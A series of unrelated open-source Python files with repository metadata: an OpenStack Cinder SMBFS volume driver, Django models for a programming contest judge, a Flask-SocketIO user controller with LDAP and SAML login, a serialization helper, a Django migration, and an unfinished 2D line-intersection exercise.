if volume['provider_location'] in self.shares:
data['options'] = self.shares[volume['provider_location']]
return {
'driver_volume_type': self.driver_volume_type,
'data': data,
'mount_point_base': self._get_mount_point_base()
}
def do_setup(self, context):
config = self.configuration.smbfs_shares_config
if not config:
msg = (_("SMBFS config file not set (smbfs_shares_config)."))
LOG.error(msg)
raise exception.SmbfsException(msg)
if not os.path.exists(config):
msg = (_("SMBFS config file at %(config)s doesn't exist.") %
{'config': config})
LOG.error(msg)
raise exception.SmbfsException(msg)
if not os.path.isabs(self.base):
msg = _("Invalid mount point base: %s") % self.base
LOG.error(msg)
raise exception.SmbfsException(msg)
if not self.configuration.smbfs_oversub_ratio > 0:
msg = _(
"SMBFS config 'smbfs_oversub_ratio' invalid. Must be > 0: "
"%s") % self.configuration.smbfs_oversub_ratio
LOG.error(msg)
raise exception.SmbfsException(msg)
        if not (self.configuration.smbfs_used_ratio > 0 and
                self.configuration.smbfs_used_ratio <= 1):
msg = _("SMBFS config 'smbfs_used_ratio' invalid. Must be > 0 "
"and <= 1.0: %s") % self.configuration.smbfs_used_ratio
LOG.error(msg)
raise exception.SmbfsException(msg)
self.shares = {} # address : options
self._ensure_shares_mounted()
def local_path(self, volume):
"""Get volume path (mounted locally fs path) for given volume.
:param volume: volume reference
"""
fmt = self.get_volume_format(volume)
local_dir = self._local_volume_dir(volume)
local_path = os.path.join(local_dir, volume['name'])
if fmt in (self._DISK_FORMAT_VHD, self._DISK_FORMAT_VHDX):
local_path += '.' + fmt
return local_path
def _local_path_volume_info(self, volume):
return '%s%s' % (self.local_path(volume), '.info')
def _get_new_snap_path(self, snapshot):
vol_path = self.local_path(snapshot['volume'])
snap_path, ext = os.path.splitext(vol_path)
snap_path += '.' + snapshot['id'] + ext
return snap_path
def get_volume_format(self, volume, qemu_format=False):
volume_dir = self._local_volume_dir(volume)
volume_path = os.path.join(volume_dir, volume['name'])
if os.path.exists(volume_path):
info = self._qemu_img_info(volume_path, volume['name'])
volume_format = info.file_format
else:
volume_format = (
self._get_volume_format_spec(volume) or
self.configuration.smbfs_default_volume_format)
if qemu_format and volume_format == self._DISK_FORMAT_VHD:
volume_format = self._DISK_FORMAT_VHD_LEGACY
elif volume_format == self._DISK_FORMAT_VHD_LEGACY:
volume_format = self._DISK_FORMAT_VHD
return volume_format
@utils.synchronized('smbfs', external=False)
def delete_volume(self, volume):
"""Deletes a logical volume."""
if not volume['provider_location']:
LOG.warn(_('Volume %s does not have provider_location specified, '
'skipping.'), volume['name'])
return
self._ensure_share_mounted(volume['provider_location'])
volume_dir = self._local_volume_dir(volume)
mounted_path = os.path.join(volume_dir,
self.get_active_image_from_info(volume))
if os.path.exists(mounted_path):
self._delete(mounted_path)
else:
LOG.debug("Skipping deletion of volume %s as it does not exist." %
mounted_path)
info_path = self._local_path_volume_info(volume)
self._delete(info_path)
def get_qemu_version(self):
info, _ = self._execute('qemu-img', check_exit_code=False)
pattern = r"qemu-img version ([0-9\.]*)"
version = re.match(pattern, info)
if not version:
LOG.warn(_("qemu-img is not installed."))
return None
return [int(x) for x in version.groups()[0].split('.')]
def _create_windows_image(self, volume_path, volume_size, volume_format):
"""Creates a VHD or VHDX file of a given size."""
# vhd is regarded as vpc by qemu
if volume_format == self._DISK_FORMAT_VHD:
volume_format = self._DISK_FORMAT_VHD_LEGACY
else:
qemu_version = self.get_qemu_version()
if qemu_version < [1, 7]:
err_msg = _("This version of qemu-img does not support vhdx "
"images. Please upgrade to 1.7 or greater.")
raise exception.SmbfsException(err_msg)
self._execute('qemu-img', 'create', '-f', volume_format,
volume_path, str(volume_size * units.Gi),
run_as_root=True)
def _do_create_volume(self, volume):
"""Create a volume on given smbfs_share.
:param volume: volume reference
"""
volume_format = self.get_volume_format(volume)
volume_path = self.local_path(volume)
volume_size = volume['size']
LOG.debug("Creating new volume at %s." % volume_path)
if os.path.exists(volume_path):
msg = _('File already exists at %s.') % volume_path
LOG.error(msg)
raise exception.InvalidVolume(reason=msg)
if volume_format in (self._DISK_FORMAT_VHD, self._DISK_FORMAT_VHDX):
self._create_windows_image(volume_path, volume_size,
volume_format)
else:
self.img_suffix = None
if volume_format == self._DISK_FORMAT_QCOW2:
self._create_qcow2_file(volume_path, volume_size)
elif self.configuration.smbfs_sparsed_volumes:
self._create_sparsed_file(volume_path, volume_size)
else:
self._create_regular_file(volume_path, volume_size)
self._set_rw_permissions_for_all(volume_path)
def _get_capacity_info(self, smbfs_share):
"""Calculate available space on the SMBFS share.
:param smbfs_share: example //172.18.194.100/share
"""
mount_point = self._get_mount_point_for_share(smbfs_share)
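        # 'stat -f -c "%S %b %a"' prints the fundamental block size, the total
        # number of blocks and the number of free blocks available to
        # non-superusers, in that order.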
df, _ = self._execute('stat', '-f', '-c', '%S %b %a', mount_point,
run_as_root=True)
block_size, blocks_total, blocks_avail = map(float, df.split())
total_available = block_size * blocks_avail
total_size = block_size * blocks_total
du, _ = self._execute('du', '-sb', '--apparent-size', '--exclude',
'*snapshot*', mount_point, run_as_root=True)
total_allocated = float(du.split()[0])
return total_size, total_available, total_allocated
def _find_share(self, volume_size_in_gib):
"""Choose SMBFS share among available ones for given volume size.
        If more than one share meets the criteria, the share with the least
        allocated space is selected.
:param volume_size_in_gib: int size in GB
"""
if not self._mounted_shares:
raise exception.SmbfsNoSharesMounted()
target_share = None
target_share_reserved = 0
for smbfs_share in self._mounted_shares:
if not self._is_share_eligible(smbfs_share, volume_size_in_gib):
continue
total_allocated = self._get_capacity_info(smbfs_share)[2]
if target_share is not None:
if target_share_reserved > total_allocated:
target_share = smbfs_share
target_share_reserved = total_allocated
else:
target_share = smbfs_share
target_share_reserved = total_allocated
if target_share is None:
raise exception.SmbfsNoSuitableShareFound(
volume_size=volume_size_in_gib)
LOG.debug('Selected %s as target smbfs share.' % target_share)
return target_share
def _is_share_eligible(self, smbfs_share, volume_size_in_gib):
"""Verifies SMBFS share is eligible to host volume with given size.
        First validation step: the ratio of used space (used_space /
        total_space) must not exceed 'smbfs_used_ratio'. Second validation
        step: the apparent available space (total_size * smbfs_oversub_ratio
        - total_allocated, which differs from the actual free space when
        sparse files are used) must exceed the requested volume size.
:param smbfs_share: smbfs share
:param volume_size_in_gib: int size in GB
"""
used_ratio = self.configuration.smbfs_used_ratio
oversub_ratio = self.configuration.smbfs_oversub_ratio
requested_volume_size = volume_size_in_gib * units.Gi
total_size, total_available, total_allocated = \
self._get_capacity_info(smbfs_share)
apparent_size = max(0, total_size * oversub_ratio)
apparent_available = max(0, apparent_size - total_allocated)
used = (total_size - total_available) / total_size
if used > used_ratio:
LOG.debug('%s is above smbfs_used_ratio.' % smbfs_share)
return False
if apparent_available <= requested_volume_size:
LOG.debug('%s is above smbfs_oversub_ratio.' % smbfs_share)
return False
if total_allocated / total_size >= oversub_ratio:
LOG.debug('%s reserved space is above smbfs_oversub_ratio.' %
smbfs_share)
return False
return True
@utils.synchronized('smbfs', external=False)
def create_snapshot(self, snapshot):
"""Apply locking to the create snapshot operation."""
return self._create_snapshot(snapshot)
def _create_snapshot_online(self, snapshot, backing_filename,
new_snap_path):
msg = _("This driver does not support snapshotting in-use volumes.")
raise exception.SmbfsException(msg)
def _delete_snapshot_online(self, context, snapshot, info):
msg = _("This driver does not support deleting in-use snapshots.")
raise exception.SmbfsException(msg)
def _do_create_snapshot(self, snapshot, backing_filename, new_snap_path):
self._check_snapshot_support(snapshot)
super(SmbfsDriver, self)._do_create_snapshot(
snapshot, backing_filename, new_snap_path)
def _check_snapshot_support(self, snapshot):
volume_format = self.get_volume_format(snapshot['volume'])
# qemu-img does not yet support differencing vhd/vhdx
if volume_format in (self._DISK_FORMAT_VHD, self._DISK_FORMAT_VHDX):
err_msg = _("Snapshots are not supported for this volume "
"format: %s") % volume_format
raise exception.InvalidVolume(err_msg)
@utils.synchronized('smbfs', external=False)
def delete_snapshot(self, snapshot):
"""Apply locking to the delete snapshot operation."""
return self._delete_snapshot(snapshot)
@utils.synchronized('smbfs', external=False)
def extend_volume(self, volume, size_gb):
LOG.info(_('Extending volume %s.'), volume['id'])
self._extend_volume(volume, size_gb)
def _extend_volume(self, volume, size_gb):
volume_path = self.local_path(volume)
self._check_extend_volume_support(volume, size_gb)
LOG.info(_('Resizing file to %sG...') % size_gb)
self._do_extend_volume(volume_path, size_gb, volume['name'])
def _do_extend_volume(self, volume_path, size_gb, volume_name):
info = self._qemu_img_info(volume_path, volume_name)
fmt = info.file_format
        # Note(lpetrut): as of version 2.0, qemu-img cannot resize
# vhd/x images. For the moment, we'll just use an intermediary
# conversion in order to be able to do the resize.
if fmt in (self._DISK_FORMAT_VHDX, self._DISK_FORMAT_VHD_LEGACY):
temp_image = volume_path + '.tmp'
image_utils.convert_image(volume_path, temp_image,
self._DISK_FORMAT_RAW)
image_utils.resize_image(temp_image, size_gb)
image_utils.convert_image(temp_image, volume_path, fmt)
self._delete(temp_image)
else:
image_utils.resize_image(volume_path, size_gb)
if not self._is_file_size_equal(volume_path, size_gb):
raise exception.ExtendVolumeError(
reason='Resizing image file failed.')
def _check_extend_volume_support(self, volume, size_gb):
volume_path = self.local_path(volume)
active_file = self.get_active_image_from_info(volume)
active_file_path = os.path.join(self._local_volume_dir(volume),
active_file)
if active_file_path != volume_path:
msg = _('Extend volume is only supported for this '
'driver when no snapshots exist.')
raise exception.InvalidVolume(msg)
extend_by = int(size_gb) - volume['size']
if not self._is_share_eligible(volume['provider_location'],
extend_by):
raise exception.ExtendVolumeError(reason='Insufficient space to '
'extend volume %s to %sG.'
% (volume['id'], size_gb))
@utils.synchronized('smbfs', external=False)
def copy_volume_to_image(self, context, volume, image_service, image_meta):
self._copy_volume_to_image(context, volume, image_service, image_meta)
@utils.synchronized('smbfs', external=False)
def create_volume_from_snapshot(self, volume, snapshot):
self._create_volume_from_snapshot(volume, snapshot)
def _copy_volume_from_snapshot(self, snapshot, volume, volume_size):
"""Copy data from snapshot to destination volume.
This is done with a qemu-img convert to raw/qcow2 from the snapshot
qcow2.
"""
LOG.debug("Snapshot: %(snap)s, volume: %(vol)s, "
"volume_size: %(size)s" %
{'snap': snapshot['id'],
'vol': volume['id'],
'size': volume_size})
info_path = self._local_path_volume_info(snapshot['volume'])
snap_info = self._read_info_file(info_path)
vol_dir = self._local_volume_dir(snapshot['volume'])
out_format = self.get_volume_format(volume, qemu_format=True)
forward_file = snap_info[snapshot['id']]
forward_path = os.path.join(vol_dir, forward_file)
# Find the file which backs this file, which represents the point
# when this snapshot was created.
img_info = self._qemu_img_info(forward_path,
snapshot['volume']['name'])
path_to_snap_img = os.path.join(vol_dir, img_info.backing_file)
LOG.debug("Will copy from snapshot at %s" % path_to_snap_img)
image_utils.convert_image(path_to_snap_img,
self.local_path(volume),
out_format)
self._extend_volume(volume, volume_size)
self._set_rw_permissions_for_all(self.local_path(volume))
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
volume_format = self.get_volume_format(volume, qemu_format=True)
image_meta = image_service.show(context, image_id)
qemu_version = self.get_qemu_version()
if (qemu_version < [1, 7] and (
volume_format == self._DISK_FORMAT_VHDX and
image_meta['disk_format'] != volume_format)):
err_msg = _("Unsupported volume format: vhdx. qemu-img 1.7 or "
"higher is required in order to properly support this "
"format.")
raise exception.InvalidVolume(err_msg)
image_utils.fetch_to_volume_format(
context, image_service, image_id,
self.local_path(volume), volume_format,
self.configuration.volume_dd_blocksize)
self._do_extend_volume(self.local_path(volume),
volume['size'],
volume['name'])
data = image_utils.qemu_img_info(self.local_path(volume))
virt_size = data.virtual_size / units.Gi
if virt_size != volume['size']:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=(_("Expected volume size was %d") % volume['size'])
+ (_(" but size is now %d.") % virt_size))
@utils.synchronized('smbfs', external=False)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
self._create_cloned_volume(volume, src_vref)
def _ensure_share_mounted(self, smbfs_share):
mnt_flags = []
if self.shares.get(smbfs_share) is not None:
mnt_flags = self.shares[smbfs_share]
# The domain name must be removed from the
# user name when using Samba.
mnt_flags = self.parse_credentials(mnt_flags).split()
self._remotefsclient.mount(smbfs_share, mnt_flags)
def parse_options(self, option_str):
opts_dict = {}
opts_list = []
if option_str:
for i in option_str.split():
if i == '-o':
continue
for j in i.split(','):
tmp_opt = j.split('=')
if len(tmp_opt) > 1:
opts_dict[tmp_opt[0]] = tmp_opt[1]
else:
opts_list.append(tmp_opt[0])
return opts_list, opts_dict
def parse_credentials(self, mnt_flags):
options_list, options_dict = self.parse_options(mnt_flags)
username = (options_dict.pop('user', None) or
options_dict.pop('username', None))
if username:
# Remove the Domain from the user name
options_dict['username'] = username.split('\\')[-1]
else:
options_dict['username'] = 'guest'
named_options = ','.join("%s=%s" % (key, val) for (key, val)
in options_dict.iteritems())
options_list = ','.join(options_list)
flags = '-o ' + ','.join([named_options, options_list])
return flags.strip(',')
def _get_volume_format_spec(self, volume):
extra_specs = []
metadata_specs = volume.get('volume_metadata') or []
extra_specs += metadata_specs
vol_type = volume.get('volume_type')
if vol_type:
volume_type_specs = vol_type.get('extra_specs') or []
extra_specs += volume_type_specs
for spec in extra_specs:
if 'volume_format' in spec.key:
return spec.value
return None
def _is_file_size_equal(self, path, size):
"""Checks if file size at path is equal to size."""
data = image_utils.qemu_img_info(path)
virt_size = data.virtual_size / units.Gi
return virt_size == size
|
{
"content_hash": "ce46a3caa2b7c468715bd08cb968d5f3",
"timestamp": "",
"source": "github",
"line_count": 582,
"max_line_length": 79,
"avg_line_length": 41.197594501718214,
"alnum_prop": 0.5815156191350044,
"repo_name": "jumpstarter-io/cinder",
"id": "d824e8127eed1ce503b07772b7d6f69595509ee0",
"size": "24620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cinder/volume/drivers/smbfs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.contrib.auth.models import User
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from django.core.exceptions import PermissionDenied
# Create your models here.
@python_2_unicode_compatible
class Problem(models.Model):
problem = models.ForeignKey('bank.problem', verbose_name='problem', on_delete=models.CASCADE)
max_score = models.FloatField(default=0)
class Meta:
verbose_name = 'Contest Problem'
ordering = ['problem_id']
def __str__(self):
return "{} : {}".format(self.problem.problem_id, self.problem.title)
class Submission(models.Model):
id = models.AutoField(primary_key=True)
problem = models.ForeignKey('bank.problem', on_delete=models.CASCADE)
score = models.DecimalField(default=0, max_digits=5, decimal_places=2)
time = models.DateTimeField(
auto_now_add=True, verbose_name='Submission Time')
user = models.ForeignKey(User, verbose_name='submitted-by', on_delete=models.CASCADE)
ip = models.GenericIPAddressField(
verbose_name='submitted-by (IP)', blank=True, null=True)
local_file = models.CharField(
max_length=150, null=True, verbose_name='Original File')
testcase_codes = models.CharField(
default="[-1]", max_length=100, verbose_name="Testcase Status Code")
def __str__(self):
return "{} - {} - {}".format(
self.user.username, self.problem.title, self.time)
def testcase_result_verbose(self):
def code_to_string(code):
# code = int(code.strip())
if(code == 0):
return "Pass"
elif(code == 1):
return "SandboxFailure"
elif(code == 2):
return "RuntimeError"
elif(code == 3):
return "MemLimExceeded"
elif(code == 4):
return "TimeLimExceeded"
elif(code == 5):
return "SandboxChildProcessExceeded"
elif(code == 6):
return "CompilationErr"
elif(code == 7):
return "IncorrectAnswer"
else:
return "default"
tests = list(
map(int, self.testcase_codes.replace(" ", "")[1:-1].split(',')))
print(tests)
return list(map(code_to_string, tests))
class Meta:
# Ordering submissions in descending order as per time
ordering = ["-time"]
class Config(models.Model):
start = models.DateTimeField(verbose_name='Start Time')
end = models.DateTimeField(verbose_name='End Time')
# Don't allow more than one config per contest
@receiver(pre_save, sender=Config)
def check_config_count(sender, **kwargs):
if sender.objects.count() >= 1:
ErrorMessage = """
More than one config per contest is not allowed.
To add another first delete the previous one.
"""
raise PermissionDenied(ErrorMessage)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
logged_in = models.BooleanField(default=False)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
|
{
"content_hash": "9a06eb027452332afb921712ee887df4",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 97,
"avg_line_length": 33.45192307692308,
"alnum_prop": 0.6335153779821788,
"repo_name": "CRUx-BPHC/crux-judge",
"id": "b17d1f93f2ed9b875a879b94b7fed7307ef4c1b6",
"size": "3479",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/server/contest/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "317"
},
{
"name": "HTML",
"bytes": "2034"
},
{
"name": "Python",
"bytes": "24648"
}
],
"symlink_target": ""
}
|
"""
filename: controllers.py
description: Controller for Users.
created by: Omar De La Hoz (oed7416@rit.edu)
created on: 09/07/17
"""
from flask_socketio import emit
from app.decorators import ensure_dict, get_user
from app import socketio, db
from app.users.models import Users, Roles
from app.users.users_response import Response
from app import saml_manager
from flask_login import login_user, current_user
from flask import redirect, jsonify
import ldap
@socketio.on('get_all_users')
def get_all_users():
users = Users.query.filter_by().all()
users_ser = [{"username": user.id, "name": user.first_name + " " + user.last_name} for user in users]
emit('get_all_users', users_ser)
return;
# setup acs response handler
@saml_manager.login_from_acs
def login_from_acs(acs):
if acs.get('errors'):
return jsonify({'errors': acs.get('errors')})
elif not acs.get('logged_in'):
return jsonify({"error": "login failed"})
else:
attributes = list(acs.get("attributes"))
username = attributes[0][1][0]
firstname = attributes[1][1][0]
lastname = attributes[2][1][0]
email = attributes[3][1][0]
user = Users.query.filter_by(id = username).first()
if user is None:
user = Users(id = username)
user.first_name = firstname
user.last_name = lastname
user.email = email
db.session.add(user)
db.session.commit()
login_user(user)
return redirect('/')
@socketio.on('verify_auth')
@ensure_dict
@get_user
def verify(user, user_data):
if not user:
emit('verify_auth', Response.AuthError)
return;
emit('verify_auth', {
'admin': user.is_admin,
'username': user.id
})
@socketio.on('auth')
@ensure_dict
def login_ldap(credentials):
ldap_server = "ldaps://ldap.rit.edu"
if credentials.get("username","") == "" or credentials.get("password","") == "":
emit('auth', {'error': "Authentication error."})
return;
user_dn = "uid=" + credentials.get("username","") + ",ou=People,dc=rit,dc=edu"
search_filter = "uid=" + credentials.get("username","")
connect = ldap.initialize(ldap_server)
try:
connect.bind_s(user_dn, credentials.get("password",""))
result = connect.search_s(user_dn,ldap.SCOPE_SUBTREE,search_filter)
connect.unbind_s()
values = result[0][1]
username = values["uid"][0].decode('utf-8')
firstname = values["givenName"][0].decode('utf-8')
lastname = values["sn"][0].decode('utf-8')
email = values["mail"][0].decode('utf-8')
# Check if a user exists.
if Users.query.filter_by(id = username).first() is not None:
user = Users.query.filter_by(id = username).first()
token = user.generate_auth()
admin = user.is_admin
emit('auth', {
'token': token.decode('ascii'),
'admin': admin,
'username': username
})
else:
user = Users(id = username)
user.first_name = firstname
user.last_name = lastname
user.email = email
db.session.add(user)
db.session.commit()
token = user.generate_auth()
emit('auth', {'token': token.decode('ascii')})
except ldap.LDAPError:
connect.unbind_s()
emit('auth', Response.AuthError)
return;
##
## @brief Changes a user's role to ManagerUser,
## AdminUser or NormalUser.
##
## @param user The user performing the edit.
## @param user_data JSON object containing:
##
## - username: username of the user with
## edited roles.
## - role: AdminUser, ManagerUser or NormalUser.
##
## @emit Success if role was set, PermError if user is not
## an AdminUser, UserNotFound if user is not found,
## RoleNotFound if role doesn't exist and DBError if
## something went wrong in DB-side.
##
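## Example client call (illustrative; the 'token' key is an assumption based
## on the auth handlers above, which @get_user resolves to a user):
##   socket.emit('edit_roles',
##               {'token': '<auth token>', 'username': 'abc1234',
##                'role': 'ManagerUser'})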
@socketio.on('edit_roles')
@ensure_dict
@get_user
def edit_roles(user, user_data):
if not user.is_admin:
emit('auth', Response.PermError)
return;
edit_user = Users.query.filter_by(id = user_data["username"]).first()
if not edit_user:
emit('edit_roles', Response.UserNotFound)
return;
try:
role = Roles[user_data["role"]]
except:
emit('edit_roles', Response.RoleNotFound)
return;
if role == Roles.AdminUser:
edit_user.is_admin = True
elif role == Roles.ManagerUser:
edit_user.is_admin = True
else:
edit_user.is_admin = False
try:
db.session.commit()
emit('edit_roles', {"success": "Role set to " + role.value + "."})
except Exception as e:
db.session.rollback()
emit('edit_roles', Response.DBError)
return;
|
{
"content_hash": "0f234d2b05d5160473ddcfad1465e2a0",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 105,
"avg_line_length": 28.316384180790962,
"alnum_prop": 0.580806065442937,
"repo_name": "ritstudentgovernment/chargeflask",
"id": "75c5c6a1e4c7ff364c127a4a4c45b312ec04df70",
"size": "5012",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/users/controllers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1632"
},
{
"name": "Dockerfile",
"bytes": "381"
},
{
"name": "HTML",
"bytes": "21682"
},
{
"name": "Python",
"bytes": "221454"
},
{
"name": "Shell",
"bytes": "132"
}
],
"symlink_target": ""
}
|
import copy
class SerializableObject(object):
def __init__(self):
pass
def update(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
def as_dict(self):
# use deepcopy so that changing this dictionary later won't affect the SerializableObject
d = copy.deepcopy(self.__dict__)
for k in list(d.keys()):
if d[k] is None:
del d[k]
# recursive serialization
for k, v in d.items():
if isinstance(v, SerializableObject):
d[k] = v.as_dict()
if isinstance(v, list):
for i, e in enumerate(v):
if isinstance(e, SerializableObject):
d[k][i] = e.as_dict()
if isinstance(v, dict):
for l, w in v.items():
if isinstance(w, SerializableObject):
d[k][l] = w.as_dict()
return d
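# Minimal usage sketch (illustrative; the Job subclass below is hypothetical
# and not part of this module):
if __name__ == "__main__":
    class Job(SerializableObject):
        def __init__(self):
            self.name = None
            self.child = None
    job = Job()
    job.update(name="demo", child=Job())
    job.child.update(name="inner")
    # None-valued fields are dropped and nested objects become dicts:
    print(job.as_dict())  # -> {'name': 'demo', 'child': {'name': 'inner'}}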
|
{
"content_hash": "13a873d4862fc2537a0f7e407c82ef05",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 97,
"avg_line_length": 32.13333333333333,
"alnum_prop": 0.48858921161825725,
"repo_name": "4dn-dcic/tibanna",
"id": "4f9af45f4a8419f5d8144fc8955e3ca8505bb98a",
"size": "964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tibanna/base.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Common Workflow Language",
"bytes": "1542"
},
{
"name": "Dockerfile",
"bytes": "3222"
},
{
"name": "HTML",
"bytes": "320852"
},
{
"name": "Makefile",
"bytes": "953"
},
{
"name": "Python",
"bytes": "576806"
},
{
"name": "Shell",
"bytes": "50474"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('markets', '0057_auto_20170228_1530'),
]
operations = [
migrations.AlterModelOptions(
name='market',
options={'permissions': (('can_publish', 'Can publish Market'), ('can_unpublish', 'Can unpublish Market'))},
),
]
|
{
"content_hash": "10f0a0b7aad1709195ded5e616a5c382",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 120,
"avg_line_length": 24.352941176470587,
"alnum_prop": 0.6086956521739131,
"repo_name": "uktrade/navigator",
"id": "e840914258fc123b16de99cb719fead346028959",
"size": "487",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "app/markets/migrations/0058_auto_20170505_1140.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "143"
},
{
"name": "HTML",
"bytes": "55604"
},
{
"name": "JavaScript",
"bytes": "53405"
},
{
"name": "Makefile",
"bytes": "4355"
},
{
"name": "Procfile",
"bytes": "181"
},
{
"name": "Python",
"bytes": "243097"
},
{
"name": "SCSS",
"bytes": "125647"
},
{
"name": "Shell",
"bytes": "5758"
}
],
"symlink_target": ""
}
|
from decimal import Decimal, getcontext
from vector import Vector
import random
getcontext().prec = 30
class Line(object):
NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found'
def __init__(self, normal_vector=None, constant_term=None):
self.dimension = 2
if not normal_vector:
all_zeros = ['0']*self.dimension
normal_vector = Vector(all_zeros)
self.normal_vector = normal_vector
if not constant_term:
constant_term = Decimal('0')
self.constant_term = Decimal(constant_term)
self.set_basepoint()
def set_basepoint(self):
try:
n = self.normal_vector
c = self.constant_term
basepoint_coords = ['0']*self.dimension
initial_index = Line.first_nonzero_index(n)
'''
initial_coefficient = n[initial_index]
basepoint_coords[initial_index] = c/initial_coefficient
self.basepoint = Vector(basepoint_coords)
'''
except Exception as e:
if str(e) == Line.NO_NONZERO_ELTS_FOUND_MSG:
self.basepoint = None
else:
raise e
def __str__(self):
num_decimal_places = 3
def write_coefficient(coefficient, is_initial_term=False):
coefficient = round(coefficient, num_decimal_places)
if coefficient % 1 == 0:
coefficient = int(coefficient)
output = ''
if coefficient < 0:
output += '-'
if coefficient > 0 and not is_initial_term:
output += '+'
if not is_initial_term:
output += ' '
if abs(coefficient) != 1:
output += '{}'.format(abs(coefficient))
return output
n = self.normal_vector
try:
initial_index = Line.first_nonzero_index(n)
terms = [write_coefficient(n[i], is_initial_term=(i==initial_index)) + 'x_{}'.format(i+1)
for i in range(self.dimension) if round(n[i], num_decimal_places) != 0]
output = ' '.join(terms)
except Exception as e:
if str(e) == self.NO_NONZERO_ELTS_FOUND_MSG:
output = '0'
else:
raise e
constant = round(self.constant_term, num_decimal_places)
if constant % 1 == 0:
constant = int(constant)
output += ' = {}'.format(constant)
return output
@staticmethod
def first_nonzero_index(iterable):
for k, item in enumerate(iterable):
if not MyDecimal(item).is_near_zero():
return k
raise Exception(Line.NO_NONZERO_ELTS_FOUND_MSG)
'''
Two lines are parallel if their normal vectors are parallel.
'''
def is_parallel(self, line):
return Vector(self.normal_vector).is_parallel(Vector(line.normal_vector))
'''
    To check if two lines are equal, take a point on each line and compute
    the vector connecting the two points. If that connecting vector is
    orthogonal to the normal vectors of both lines, it lies along both lines
    and the two lines are equal.
'''
def equals(self, line):
x = random.randint(0,100)
#dir_vec = [self.normal_vector[1], -1*self.normal_vector[0]]
k = float(self.constant_term)
A = self.normal_vector[0]
B = self.normal_vector[1]
y = (k-A*x)/B
pt1 = Vector([x,y])
x = random.randint(0,100)
#dir_vec = [line.normal_vector[1], -1*line.normal_vector[0]]
k = float(line.constant_term)
A = line.normal_vector[0]
B = line.normal_vector[1]
y = (k-A*x)/B
pt2 = Vector([x,y])
vec = pt2-pt1
return (vec.is_orthogonal(Vector(self.normal_vector)) \
and vec.is_orthogonal(Vector(line.normal_vector)))
'''
If they are not parallel and not equal, they intersect. Find the point of intersection
using the formulas derived in the lecture
'''
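    # Worked example (illustrative): for x + y = 1 and x - y = 0,
    # A, B, k1 = 1, 1, 1 and C, D, k2 = 1, -1, 0, so
    #   x = (D*k1 - B*k2) / (A*D - B*C) = -1 / -2 = 0.5
    #   y = (-C*k1 + A*k2) / (A*D - B*C) = -1 / -2 = 0.5
    # i.e. the lines intersect at (0.5, 0.5).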
def intersection(self, line):
p = self.is_parallel(line)
e = self.equals(line)
if not p and not e:
#calculate x and y using the derived formula in the lecture
A = self.normal_vector[0]
B = self.normal_vector[1]
C = line.normal_vector[0]
D = line.normal_vector[1]
k1 = float(self.constant_term)
k2 = float(line.constant_term)
x = (D*k1-B*k2)/(A*D-B*C)
y = (-1*C*k1 + A*k2)/(A*D-B*C)
return Vector([x,y])
else:
if p and e:
return 'Inf'
return None
class MyDecimal(Decimal):
def is_near_zero(self, eps=1e-10):
return abs(self) < eps
# Ax+By=k
# normal_vector = [A, B]
# constant_term = k
line1 = Line([1.,1.],constant_term=1)
line2 = Line([-3.,-3.], constant_term=-3)
print str(line1.equals(line2))
print line1.intersection(line2)
#Quiz
# 4.046x + 2.836y = 1.21
# 10.115x + 7.09y = 3.025
line1 = Line([4.046, 2.836], 1.21)
line2 = Line([10.115, 7.09], 3.025)
intx = line1.intersection(line2)
if type(intx) is str and intx=='Inf':
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'equal'])
elif type(intx) is Vector:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', str(intx)])
else:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'NO_INTERSECTION'])
print ''
# 7.204x + 3.182y = 8.68
# 8.172x + 4.114y = 9.883
line1 = Line([7.204, 3.182], 8.68)
line2 = Line([8.172, 4.114], 9.883)
intx = line1.intersection(line2)
if type(intx) is str and intx=='Inf':
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'equal'])
elif type(intx) is Vector:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', str(intx)])
else:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'NO_INTERSECTION'])
print ''
# 1.182x + 5.562y = 6.744
# 1.773x + 8.343y = 9.525
line1 = Line([1.182, 5.562], 6.744)
line2 = Line([1.773, 8.343], 9.525)
intx = line1.intersection(line2)
if type(intx) is str and intx=='Inf':
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'equal'])
elif type(intx) is Vector:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', str(intx)])
else:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'NO_INTERSECTION'])
|
{
"content_hash": "e1ece0efcd09028c50479e151f220521",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 101,
"avg_line_length": 30.957142857142856,
"alnum_prop": 0.5546838947854176,
